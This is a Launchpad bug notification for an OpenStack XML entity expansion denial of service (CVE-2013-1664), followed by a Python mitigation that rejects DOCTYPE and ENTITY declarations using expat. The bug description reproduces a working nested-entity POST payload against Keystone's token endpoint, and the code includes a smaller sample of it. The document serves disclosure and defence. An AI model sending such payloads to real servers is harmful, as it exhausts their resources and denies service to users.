** Changed in: oslo/grizzly
       Importance: Undecided => High

** Changed in: oslo/grizzly
       Status: New => Fix Released

** Changed in: oslo/grizzly
    Milestone: None => 2013.1

** Changed in: oslo/grizzly
     Assignee: (unassigned) => Davanum Srinivas (DIMS) (dims-v)

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to quantum.
https://bugs.launchpad.net/bugs/1100282

Title:
  DoS through XML entity expansion (CVE-2013-1664)

Status in Cinder:
  Fix Released
Status in Cinder folsom series:
  Fix Committed
Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Committed
Status in Keystone folsom series:
  Fix Committed
Status in OpenStack Compute (Nova):
  Fix Released
Status in OpenStack Compute (nova) essex series:
  Fix Committed
Status in OpenStack Compute (nova) folsom series:
  Fix Committed
Status in Oslo - a Library of Common OpenStack Code:
  Fix Released
Status in oslo grizzly series:
  Fix Released
Status in OpenStack Quantum (virtual network service):
  Fix Released

Bug description:
  Jonathan Murray from NCC Group reported that you can DoS keystone
  servers using XML entities in Keystone requests.

  [ Joshua Harlow from Yahoo! independently reported the same issue
  plaguing Nova (using minidom). ]

  POST /v2.0/tokens HTTP/1.1
  content-type: application/xml

  <!DOCTYPE foo [
    <!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
    <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
    <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
  ]>
  <auth>
    <tenantName>&c;</tenantName>
    <passwordCredentials>
      <username>&c;</username>
      <username>&c;</username>
      <username>&c;</username>
      <username>&c;</username>
      <password>&c;</password>
      <somethingElse>&c;</somethingElse>
      <somethingElse1>&c;</somethingElse1>
      <somethingElse2>&c;</somethingElse2>
    </passwordCredentials>
  </auth>

  In that precise case it might be an issue with the XML library we
  use, although it sounds generally safer to disable parsing ENTITY
  blocks entirely if we can.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1100282/+subscriptions

--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to     : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp
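The bug description's own suggestion is to stop parsing ENTITY blocks altogether rather than trust the XML library to bound expansion. The block below is an added illustration of that mitigation written for this page; it is not code from the bug report or from any OpenStack project. It uses the standard-library expat bindings, which call `StartDoctypeDeclHandler` as soon as `<!DOCTYPE` is seen, before any entity in the internal subset is declared or expanded, so raising there rejects the request without ever paying the expansion cost. The names `check_no_entities`, `safe_fromstring`, `is_safe_xml` and the two sample requests are assumptions constructed for the example; the second sample mirrors the three-level entity chain in the report (8 x 8 = 64 copies of the base string per `&c;` reference) but with a short base string.

```python
"""Refuse XML that carries a DOCTYPE or ENTITY declaration before it is expanded."""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class EntityDeclarationError(ValueError):
    """Raised when a document declares a DOCTYPE or an ENTITY."""


def _refuse_doctype(name, sysid, pubid, has_internal_subset):
    # expat fires this on "<!DOCTYPE ...>" before reading the internal subset,
    # so nothing has been declared, let alone expanded, when we abort here.
    raise EntityDeclarationError("DOCTYPE declaration not accepted: %r" % name)


def _refuse_entity(name, is_param, value, base, sysid, pubid, notation):
    # Defence in depth; with the DOCTYPE handler installed this is never reached.
    raise EntityDeclarationError("ENTITY declaration not accepted: %r" % name)


def check_no_entities(xml_bytes):
    """Stream the document through expat; raise on any DOCTYPE/ENTITY.

    Returns None when the document is plain, entity-free XML.  Malformed XML
    raises xml.parsers.expat.ExpatError as usual.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _refuse_doctype
    parser.EntityDeclHandler = _refuse_entity
    # Never resolve parameter entities / external DTD subsets either.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(xml_bytes, True)


def safe_fromstring(xml_bytes):
    """ET.fromstring, gated on check_no_entities() having accepted the input."""
    check_no_entities(xml_bytes)
    return ET.fromstring(xml_bytes)


def is_safe_xml(xml_bytes):
    """True if the document parses and declares neither DOCTYPE nor ENTITY."""
    try:
        check_no_entities(xml_bytes)
    except (EntityDeclarationError, xml.parsers.expat.ExpatError):
        return False
    return True


# Constructed sample requests (not taken verbatim from the report): a benign
# token request and one carrying a small three-level entity chain.
BENIGN_REQUEST = b"""<auth>
  <tenantName>demo</tenantName>
  <passwordCredentials>
    <username>alice</username>
    <password>secret</password>
  </passwordCredentials>
</auth>"""

ENTITY_REQUEST = b"""<!DOCTYPE foo [
  <!ENTITY a "AAAAAAAA">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
]>
<auth><tenantName>&c;</tenantName></auth>"""


if __name__ == "__main__":
    print("benign accepted:", is_safe_xml(BENIGN_REQUEST))    # True
    print("entity request accepted:", is_safe_xml(ENTITY_REQUEST))  # False
    print("tenant:", safe_fromstring(BENIGN_REQUEST).find("tenantName").text)
```

The gate runs the document through expat once before the real parse, so the cost is a second pass over well-formed input; in exchange the expanded output is never materialised for rejected documents, which is the resource the original report exhausts. Plain `ET.fromstring` on `ENTITY_REQUEST` would happily expand the chain.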